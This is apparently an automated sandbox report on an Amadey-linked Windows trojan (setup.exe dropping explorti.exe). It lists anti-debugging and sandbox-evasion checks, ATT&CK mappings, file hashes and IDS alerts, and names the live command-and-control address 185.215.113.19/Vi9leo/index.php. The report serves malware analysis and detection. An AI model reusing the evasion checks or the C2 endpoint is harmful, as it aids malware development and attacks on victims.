                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7052 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\setup.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
                    Source: explorti.exe, explorti.exe, 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000758000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWSo
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
                    Source: setup.exe, 00000000.00000002.1692432472.0000000001411000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000758000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: setup.exe, 00000000.00000002.1691582983.00000000005BA000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1716995664.000000000114A000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1729377013.000000000114A000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: setup.exe, 00000000.00000003.1659828144.0000000001427000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
                    Source: C:\Users\user\Desktop\setup.exe System information queried: ModuleInformation
                    Source: C:\Users\user\Desktop\setup.exe Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\Desktop\setup.exe Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SIWVID
                    Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_05150DB0 rdtsc 0_2_05150DB0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F8645B mov eax, dword ptr fs:[00000030h] 6_2_00F8645B
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F8A1C2 mov eax, dword ptr fs:[00000030h] 6_2_00F8A1C2
                    Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
                    Source: explorti.exe, explorti.exe, 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: >Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F6D312 cpuid 6_2_00F6D312
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F6CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_00F6CB1A

                    Stealing of Sensitive Information

                    Source: Yara match File source: 2.2.explorti.exe.f50000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.setup.exe.3c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.explorti.exe.f50000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.explorti.exe.f50000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000003.1651021209.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000003.1689016813.0000000005740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000003.2289232500.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1691354588.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000003.1676236773.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.1716934114.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000002.1729291467.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                    | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
                    | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 12 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                    | Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                    | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 12 Process Injection | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                    | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 251 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction |
                    | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                    | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                    | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 224 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
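                    | Source | Detection | Scanner | Label | Link |
                    | --- | --- | --- | --- | --- |
                    | setup.exe | 100% | Avira | TR/Crypt.TPM.Gen | |
                    | setup.exe | 100% | Joe Sandbox ML | | |

                    | Source | Detection | Scanner | Label | Link |
                    | --- | --- | --- | --- | --- |
                    | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | 100% | Avira | TR/Crypt.TPM.Gen | |
                    | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | 100% | Joe Sandbox ML | | |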
                    No Antivirus matches
                    No Antivirus matches
                    No contacted domains info
                    | Name | Malicious | Antivirus Detection | Reputation |
                    | --- | --- | --- | --- |
                    | http://185.215.113.19/Vi9leo/index.php | true | Avira URL Cloud: phishing | unknown |
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    185.215.113.19 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1483206
                    Start date and time:2024-07-26 20:55:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 57s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:setup.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target explorti.exe, PID 7632 because there are no executed function
                    • Execution Graph export aborted for target explorti.exe, PID 7744 because there are no executed function
                    • Execution Graph export aborted for target setup.exe, PID 7448 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: setup.exe
                    Time | Type | Description
                    14:57:01 | API Interceptor | 1186x Sleep call for process: explorti.exe modified
                    19:55:58 | Task Scheduler | Run new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    185.215.113.19 | file.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 185.215.113.19/Vi9leo/index.php
                    185.215.113.19 | file.exe | malicious | Amadey, Babadeda, RedLine, Stealc, Vidar | 185.215.113.19/Vi9leo/index.php
                    185.215.113.19 | 6SoKuOqyNh.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 185.215.113.19/Vi9leo/index.php
                    185.215.113.19 | SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe | malicious | Amadey | 185.215.113.19/Vi9leo/index.php
                    185.215.113.19 | LbMTyCFRzs.exe | malicious | Amadey | 185.215.113.19/Vi9leo/index.php
                    185.215.113.19 | file.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 185.215.113.19/Vi9leo/index.php
                    185.215.113.19 | DHBIT8FeuO.exe | malicious | Amadey | 185.215.113.19/Vi9leo/index.php
                    185.215.113.19 | JGKjBsQrMc.exe | malicious | Amadey, Babadeda, RedLine, Stealc, Vidar | 185.215.113.19/Vi9leo/index.php
                    No context
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 185.215.113.16
                    WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Babadeda, RedLine, Stealc, Vidar | 185.215.113.16
                    WHOLESALECONNECTIONSNL | file.exe | malicious | RedLine | 185.215.113.9
                    WHOLESALECONNECTIONSNL | file.exe | malicious | RedLine | 185.215.113.9
                    WHOLESALECONNECTIONSNL | 6SoKuOqyNh.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 185.215.113.16
                    WHOLESALECONNECTIONSNL | SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe | malicious | Amadey | 185.215.113.19
                    WHOLESALECONNECTIONSNL | EXyAlLKIck.exe | malicious | Amadey | 185.215.113.16
                    WHOLESALECONNECTIONSNL | IRqsWvBBMc.exe | malicious | Amadey, Vidar | 185.215.113.16
                    WHOLESALECONNECTIONSNL | LbMTyCFRzs.exe | malicious | Amadey | 185.215.113.19
                    WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 185.215.113.16
                    No context
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | file.exe | malicious | Amadey, Babadeda, Stealc, Vidar |
                      Process:C:\Users\user\Desktop\setup.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):1909760
                      Entropy (8bit):7.949641205972528
                      Encrypted:false
                      SSDEEP:49152:tlkWk0JDpvefwG7tfhTkSkB6K4uzolV8ApUS3xCMBfkkECS:taWvnvH0fhTsY7J3xCMR/
                      MD5:2AF5EB9FB318C9A454DE54914E121031
                      SHA1:FCBAEA817B8EB0D63BA7B31804BE2353D564BA93
                      SHA-256:589EB31A43D44FE275C70BFC3F592965B9236B59645A7ED633BBEC66526D64AB
                      SHA-512:5873029940644909567F97A6D4C78D78064E7FFF22CC5B90FDA5F8C31017B30CA7DD2FC7672F7AB7460EE49D6154ED23EF5A52EA0077D09347B0B9CA3E9839F4
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Joe Sandbox View:
                      • Filename: file.exe, Detection: malicious, Browse
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f..............................K...........@.......................... L......:....@.................................W...k...........................4.K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... . +.........................@...usoriijt......1.....................@...ymfuwjgb......K.....................@....taggant.0....K.."..................@...........................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\setup.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:[ZoneTransfer]....ZoneId=0
                      Process:C:\Users\user\Desktop\setup.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):288
                      Entropy (8bit):3.4138816366542772
                      Encrypted:false
                      SSDEEP:6:J0rRHsX4RKUEZ+lX1cI1l6lm6tPjgsW2YRZuy0l1XRt0:J0rRH24RKQ1cag7jzvYRQV1ht0
                      MD5:B90B6DC3B47674C67FA4553DA660D55F
                      SHA1:B5302B2A25B5D562B1316775C3E3BC19AF473B6B
                      SHA-256:A2A65D2E3FB7222032AA62D400C5FB587D9FBC4F46D6107BA217EBFEEA52A4BA
                      SHA-512:C100D6AD63FC4DAD88728DA0F74586EE55BBDCC3D851764B3576F16EF9A55B2AF6E3B188B882347DA0EB0B6FCECDC8894BE87C254B116B163CA23CCC74207BAB
                      Malicious:false
                      Reputation:low
                      Preview:.....L..tkmM..m...!.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................8.@3P.........................
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.949641205972528
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:setup.exe
                      File size:1'909'760 bytes
                      MD5:2af5eb9fb318c9a454de54914e121031
                      SHA1:fcbaea817b8eb0d63ba7b31804be2353d564ba93
                      SHA256:589eb31a43d44fe275c70bfc3f592965b9236b59645a7ed633bbec66526d64ab
                      SHA512:5873029940644909567f97a6d4c78d78064e7fff22cc5b90fda5f8c31017b30ca7dd2fc7672f7ab7460ee49d6154ed23ef5a52ea0077d09347b0b9ca3e9839f4
                      SSDEEP:49152:tlkWk0JDpvefwG7tfhTkSkB6K4uzolV8ApUS3xCMBfkkECS:taWvnvH0fhTsY7J3xCMR/
                      TLSH:6B95333F4C9431E4E75D4E3AD05E3BA1D9B88250A238BFE82FD587C4B591B42BCA1479
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                      Icon Hash:90cececece8e8eb0
                      Entrypoint:0x8bf000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:0
                      File Version Major:6
                      File Version Minor:0
                      Subsystem Version Major:6
                      Subsystem Version Minor:0
                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a057 | 0x6b | .idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x1e0 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4bda34 | 0x10 | usoriijt
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x4bd9e4 | 0x18 | usoriijt
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      (unnamed) | 0x1000 | 0x68000 | 0x2dc00 | d6f6bd714358d4e2cc86535d6ac7d2dd | False | 0.9998612534153005 | data | 7.983026486073879 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc | 0x69000 | 0x1e0 | 0x200 | 5d7aaf6d88e2a9fb2a22f714c54fa253 | False | 0.576171875 | data | 4.458845368976753 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata | 0x6a000 | 0x1000 | 0x200 | cc76e3822efdc911f469a3e3cc9ce9fe | False | 0.1484375 | data | 1.0428145631430756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      (unnamed) | 0x6b000 | 0x2b2000 | 0x200 | 6d2cc301701120faa294ac0b039ad4b2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      usoriijt | 0x31d000 | 0x1a1000 | 0x1a0c00 | 2cea1fca24cb49c6e19d3a0b2ac70c77 | False | 0.9945536283368326 | data | 7.952894618410208 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      ymfuwjgb | 0x4be000 | 0x1000 | 0x400 | 2a7767b6ef35e4c8a1785e1cad05540d | False | 0.728515625 | data | 5.75808497991159 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant | 0x4bf000 | 0x3000 | 0x2200 | f9a796e180877a9fe33f6235b9fc288e | False | 0.07019761029411764 | DOS executable (COM) | 0.8015233745232316 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                      RT_MANIFEST | 0x4bda44 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
                      DLL | Import
                      kernel32.dll | lstrcpy
                      Language of compilation system | Country where language is spoken
                      English | United States
                      Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                      2024-07-26T20:57:23.145810+0200 | TCP | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 49753 | 80 | 192.168.2.4 | 185.215.113.19
                      2024-07-26T20:57:04.743588+0200 | TCP | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 49738 | 80 | 192.168.2.4 | 185.215.113.19
                      2024-07-26T20:57:09.328882+0200 | TCP | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 49742 | 80 | 192.168.2.4 | 185.215.113.19
                      2024-07-26T20:57:25.383489+0200 | TCP | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 49755 | 80 | 192.168.2.4 | 185.215.113.19
                      2024-07-26T20:57:03.607737+0200 | TCP | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 49737 | 80 | 192.168.2.4 | 185.215.113.19
                      2024-07-26T20:56:56.382955+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49736 | 13.85.23.86 | 192.168.2.4
                      2024-07-26T20:56:18.228909+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49730 | 20.12.23.50 | 192.168.2.4
                      Jul 26, 2024 20:57:11.181922913 CEST4974380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:11.182229042 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:11.187131882 CEST8049744185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:11.187208891 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:11.187298059 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:11.187500954 CEST8049743185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:11.187551022 CEST4974380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:11.192141056 CEST8049744185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:11.996247053 CEST8049744185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:11.996329069 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:11.998744011 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:12.004219055 CEST8049744185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:12.244764090 CEST8049744185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:12.244875908 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:12.354029894 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:12.354331017 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:12.359203100 CEST8049745185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:12.359291077 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:12.359446049 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:12.359631062 CEST8049744185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:12.359697104 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:12.364500046 CEST8049745185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:13.129484892 CEST8049745185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:13.129726887 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.130716085 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.136101961 CEST8049745185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:13.382339001 CEST8049745185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:13.382574081 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.498162031 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.498476028 CEST4974680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.504960060 CEST8049746185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:13.505081892 CEST4974680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.505218983 CEST4974680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.507261038 CEST8049745185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:13.507338047 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.511342049 CEST8049746185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:14.272064924 CEST8049746185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:14.272224903 CEST4974680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:14.272983074 CEST4974680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:14.277863979 CEST8049746185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:14.522800922 CEST8049746185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:14.522918940 CEST4974680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:14.635226011 CEST4974680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:14.635514975 CEST4974780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:14.642831087 CEST8049747185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:14.642951965 CEST4974780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:14.643167973 CEST4974780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:14.643438101 CEST8049746185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:14.643498898 CEST4974680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:14.649224997 CEST8049747185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:15.398758888 CEST8049747185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:15.398943901 CEST4974780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:15.399614096 CEST4974780192.168.2.4185.215.113.19
